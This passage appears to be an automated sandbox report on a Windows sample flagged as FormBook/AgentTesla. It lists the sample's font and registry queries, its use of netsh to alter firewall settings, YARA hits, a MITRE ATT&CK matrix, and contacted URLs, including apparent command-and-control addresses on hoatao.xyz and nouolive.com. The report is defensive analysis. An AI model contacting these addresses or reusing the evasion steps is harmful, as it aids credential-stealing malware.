Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 13.2.#6495PI-29458-2020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.#6495PI-29458-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.604028874.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.605088618.0000000003110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.442703762.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.496436603.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.496991473.0000000001810000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.497054579.0000000001840000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 13.2.#6495PI-29458-2020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.#6495PI-29458-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.604028874.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.605088618.0000000003110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.442703762.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.496436603.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.496991473.0000000001810000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.497054579.0000000001840000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter2	Path Interception	Process Injection612	Rootkit1	Credential API Hooking1	Security Software Discovery221	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Masquerading1	Input Capture1	Process Discovery2	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools11	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Archive Collected Data1	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion31	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection612	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information3	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing13	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
#6495PI-29458-2020.exe	20%	ReversingLabs	Win32.Trojan.AgentTesla
#6495PI-29458-2020.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
13.2.#6495PI-29458-2020.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.jiyu-kobo.co.jp/jp/B	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/P	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/P	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/P	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/I	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/I	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/I	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/I	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
www.nouolive.com/wt5i/	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/t	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/B	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/B	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/B	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.comf	0%	URL Reputation	safe
http://www.fontbureau.comf	0%	URL Reputation	safe
http://www.fontbureau.comf	0%	URL Reputation	safe
https://www.hoatao.xyz/wt5i/?q0DD6=2dfL90cX&8pjDV6=tXijk4hnD7izr0wZK7	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/%	0%	Avira URL Cloud	safe
http://www.hoatao.xyz/wt5i/?q0DD6=2dfL90cX&8pjDV6=tXijk4hnD7izr0wZK7+l+fr5rYWJObsKdpXRzMG7/vctLDNQEZfSzrEr5AJ0mQFbfi1yOCsf5g==	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/n-u3	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/m	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/m	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/m	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/ww.m	0%	Avira URL Cloud	safe
http://www.fontbureau.comm	0%	URL Reputation	safe
http://www.fontbureau.comm	0%	URL Reputation	safe
http://www.fontbureau.comm	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0trP	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/%	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/%	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/%	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm92	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ladi-dns-ssl-nlb-prod-2-d9215092a8318d52.elb.ap-southeast-1.amazonaws.com	54.169.219.94	true	false		high
www.hoatao.xyz	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.nouolive.com/wt5i/	true	Avira URL Cloud: safe	low
http://www.hoatao.xyz/wt5i/?q0DD6=2dfL90cX&8pjDV6=tXijk4hnD7izr0wZK7+l+fr5rYWJObsKdpXRzMG7/vctLDNQEZfSzrEr5AJ0mQFbfi1yOCsf5g==	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	explorer.exe, 0000000E.00000000.443706062.000000000095C000.00000004.00000020.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	#6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	#6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	#6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/jp/B	#6495PI-29458-2020.exe, 00000000.00000003.343929858.00000000054BA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	#6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	#6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	#6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/P	#6495PI-29458-2020.exe, 00000000.00000003.343929858.00000000054BA000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/I	#6495PI-29458-2020.exe, 00000000.00000003.343929858.00000000054BA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/I	#6495PI-29458-2020.exe, 00000000.00000003.343032173.00000000054B3000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.tiro.com	explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/jp/t	#6495PI-29458-2020.exe, 00000000.00000003.343230134.00000000054B9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	#6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	#6495PI-29458-2020.exe, 00000000.00000003.343929858.00000000054BA000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/B	#6495PI-29458-2020.exe, 00000000.00000003.343230134.00000000054B9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	#6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	#6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	#6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	#6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	#6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	#6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	#6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	#6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	#6495PI-29458-2020.exe, 00000000.00000003.345312048.00000000054E2000.00000004.00000001.sdmp, #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.comf	#6495PI-29458-2020.exe, 00000000.00000002.447012611.00000000054B0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.hoatao.xyz/wt5i/?q0DD6=2dfL90cX&8pjDV6=tXijk4hnD7izr0wZK7	netsh.exe, 00000014.00000002.608434509.000000000412F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/%	#6495PI-29458-2020.exe, 00000000.00000003.343929858.00000000054BA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/cabarga.html	#6495PI-29458-2020.exe, 00000000.00000003.345638270.00000000054E2000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/n-u3	#6495PI-29458-2020.exe, 00000000.00000003.343929858.00000000054BA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/m	#6495PI-29458-2020.exe, 00000000.00000003.343574431.00000000054BA000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/ww.m	#6495PI-29458-2020.exe, 00000000.00000003.343032173.00000000054B3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comm	#6495PI-29458-2020.exe, 00000000.00000002.447012611.00000000054B0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	#6495PI-29458-2020.exe, 00000000.00000003.343929858.00000000054BA000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y0trP	#6495PI-29458-2020.exe, 00000000.00000003.343230134.00000000054B9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	#6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	#6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false		high
http://www.fonts.com	#6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/%	#6495PI-29458-2020.exe, 00000000.00000003.343230134.00000000054B9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sandoll.co.kr	#6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	#6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	#6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	#6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
